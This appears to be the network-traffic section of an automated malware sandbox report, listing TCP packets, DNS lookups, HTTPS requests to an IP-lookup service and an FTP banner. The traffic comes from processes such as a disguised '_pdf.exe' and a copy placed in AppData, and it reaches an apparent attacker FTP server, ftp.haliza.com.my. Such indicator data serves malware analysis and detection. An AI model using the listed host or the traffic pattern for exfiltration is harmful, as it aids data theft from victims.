                              Sep 25, 2024 14:46:15.331830978 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.333569050 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.339924097 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.339991093 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340004921 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340091944 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.340500116 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340514898 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340527058 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340538979 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340553045 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340565920 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340579987 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.340639114 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.341074944 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.346107960 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346606016 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346652985 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346663952 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346678019 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346690893 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346697092 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346703053 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346756935 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.346839905 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346853971 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.346863985 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.346920013 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.347131014 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.347141981 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.347148895 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.347254992 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.354046106 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354101896 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354115963 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354630947 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354640961 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354645014 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354649067 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354652882 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354656935 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.354846954 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355029106 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355041027 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355047941 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355053902 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355061054 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355746031 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355756044 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355760098 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:15.355904102 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:15.421375036 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:16.296406031 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:16.420926094 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:33.817956924 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:33.822963953 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:33.865015984 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:33.869863033 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:33.869962931 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.410547972 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.447510958 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.447932959 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.447945118 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.447998047 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.449338913 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.453737974 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.453802109 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.453856945 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.459418058 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.841181993 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.841605902 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.849596977 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:34.849666119 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.849772930 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:34.857817888 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.398848057 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.399091959 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409225941 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409238100 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409245968 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409255981 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409265041 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409297943 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409341097 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409374952 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409387112 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409399033 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.409415960 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409430981 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.409449100 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.417926073 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.417938948 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.417980909 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.417999983 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.418556929 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418566942 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418576002 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418615103 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.418636084 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.418688059 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418699980 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418708086 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418737888 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.418759108 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.418853998 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.418912888 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.419166088 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.419235945 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.422843933 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.422914982 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.423538923 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.423594952 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.423634052 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.423682928 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.423713923 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.423724890 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.423777103 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.423810959 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.423922062 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.423940897 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.423952103 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.423984051 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.424091101 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.424232006 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.427927017 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.428463936 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.428474903 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.428483963 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.428566933 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.428576946 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.428673983 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.428683996 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.428711891 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.429023027 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.429229021 CEST5768765052110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.429291964 CEST6505257687192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.452270031 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.744278908 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.744622946 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.750345945 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750358105 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750368118 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750390053 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750399113 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750408888 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750421047 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750430107 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750442028 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750451088 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.750468016 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.750529051 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.755311966 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755392075 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755417109 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.755435944 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755445957 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755455017 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755464077 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755465984 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.755492926 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.755511999 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755544901 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.755554914 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755564928 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755604982 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.755661011 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.755727053 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.755894899 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760320902 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760354996 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760416031 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760474920 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760484934 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760504961 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760514021 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760525942 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760637999 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760688066 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760698080 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760706902 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760715961 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760734081 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760742903 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760751963 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760761023 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.760768890 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.761133909 CEST5085265053110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.761219978 CEST6505350852192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.796036005 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.834079981 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:35.834309101 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:35.839108944 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:36.221298933 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:36.221535921 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:36.227921963 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:36.313978910 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:36.361427069 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:36.657290936 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:36.657468081 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:36.662342072 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:36.697979927 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:36.749125957 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:37.054893970 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:37.055047989 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:37.060050964 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:37.457376003 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:37.457590103 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:37.462466955 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:37.933031082 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:37.933207035 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:37.938031912 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:38.291529894 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:38.291939020 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:38.296911955 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:38.297013998 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:38.297013998 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:38.301855087 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.207407951 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.207662106 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.212594986 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212605953 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212615013 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212650061 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212661028 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212697029 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.212733030 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212742090 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212784052 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212793112 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212812901 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.212836027 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.212869883 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.212935925 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.217852116 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.217863083 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.217870951 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.217881918 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.217892885 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.217925072 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.217959881 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.217983961 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.217988014 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.218018055 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.218074083 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.218077898 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.218084097 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.218152046 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.218228102 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.218238115 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.218255043 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.218295097 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.218342066 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.222886086 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.222912073 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.222976923 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.222987890 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223078012 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223117113 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223184109 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223305941 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223324060 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223372936 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223440886 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223565102 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223576069 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223711967 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223721981 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223730087 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223740101 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.223750114 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.224100113 CEST5137065054110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:39.224153996 CEST6505451370192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:39.249145985 CEST6505121192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:40.157882929 CEST2165051110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:40.202295065 CEST6505121192.168.2.9110.4.45.197

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 25, 2024 14:42:22.750097990 CEST6391553192.168.2.91.1.1.1
                              Sep 25, 2024 14:42:22.758646011 CEST53639151.1.1.1192.168.2.9
                              Sep 25, 2024 14:42:25.345156908 CEST6528753192.168.2.91.1.1.1
                              Sep 25, 2024 14:42:25.602282047 CEST53652871.1.1.1192.168.2.9
                              Sep 25, 2024 14:42:39.789267063 CEST53516811.1.1.1192.168.2.9
                              Sep 25, 2024 14:42:52.602130890 CEST53531031.1.1.1192.168.2.9
                              Sep 25, 2024 14:43:06.584023952 CEST5363937162.159.36.2192.168.2.9
                              Sep 25, 2024 14:43:07.114942074 CEST53552761.1.1.1192.168.2.9

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Sep 25, 2024 14:42:22.750097990 CEST192.168.2.91.1.1.10x29c0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                              Sep 25, 2024 14:42:25.345156908 CEST192.168.2.91.1.1.10xffddStandard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 25, 2024 14:42:22.758646011 CEST1.1.1.1192.168.2.90x29c0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                              Sep 25, 2024 14:42:22.758646011 CEST1.1.1.1192.168.2.90x29c0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                              Sep 25, 2024 14:42:22.758646011 CEST1.1.1.1192.168.2.90x29c0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                              Sep 25, 2024 14:42:25.602282047 CEST1.1.1.1192.168.2.90xffddNo error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • api.ipify.org

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.949709172.67.74.1524438096C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              TimestampBytes transferredDirectionData
                              2024-09-25 12:42:23 UTC155OUTGET / HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                              Host: api.ipify.org
                              Connection: Keep-Alive
                              2024-09-25 12:42:24 UTC211INHTTP/1.1 200 OK
                              Date: Wed, 25 Sep 2024 12:42:23 GMT
                              Content-Type: text/plain
                              Content-Length: 11
                              Connection: close
                              Vary: Origin
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              CF-RAY: 8c8b180bcc8a0ce9-EWR
                              2024-09-25 12:42:24 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                              Data Ascii: 8.46.123.33


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.949714172.67.74.152443764C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              TimestampBytes transferredDirectionData
                              2024-09-25 12:42:29 UTC155OUTGET / HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                              Host: api.ipify.org
                              Connection: Keep-Alive
                              2024-09-25 12:42:29 UTC211INHTTP/1.1 200 OK
                              Date: Wed, 25 Sep 2024 12:42:29 GMT
                              Content-Type: text/plain
                              Content-Length: 11
                              Connection: close
                              Vary: Origin
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              CF-RAY: 8c8b182d19de42fd-EWR
                              2024-09-25 12:42:29 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                              Data Ascii: 8.46.123.33


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.949720172.67.74.1524433236C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              TimestampBytes transferredDirectionData
                              2024-09-25 12:42:36 UTC155OUTGET / HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                              Host: api.ipify.org
                              Connection: Keep-Alive
                              2024-09-25 12:42:36 UTC211INHTTP/1.1 200 OK
                              Date: Wed, 25 Sep 2024 12:42:36 GMT
                              Content-Type: text/plain
                              Content-Length: 11
                              Connection: close
                              Vary: Origin
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              CF-RAY: 8c8b1857b9ae420a-EWR
                              2024-09-25 12:42:36 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                              Data Ascii: 8.46.123.33


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.955429172.67.74.1524434216C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              TimestampBytes transferredDirectionData
                              2024-09-25 12:42:43 UTC155OUTGET / HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                              Host: api.ipify.org
                              Connection: Keep-Alive
                              2024-09-25 12:42:43 UTC211INHTTP/1.1 200 OK
                              Date: Wed, 25 Sep 2024 12:42:43 GMT
                              Content-Type: text/plain
                              Content-Length: 11
                              Connection: close
                              Vary: Origin
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              CF-RAY: 8c8b18875d5b726e-EWR
                              2024-09-25 12:42:43 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                              Data Ascii: 8.46.123.33


                              FTP Packets

                              TimestampSource PortDest PortSource IPDest IPCommands
                              Sep 25, 2024 14:42:26.554580927 CEST2149712110.4.45.197192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
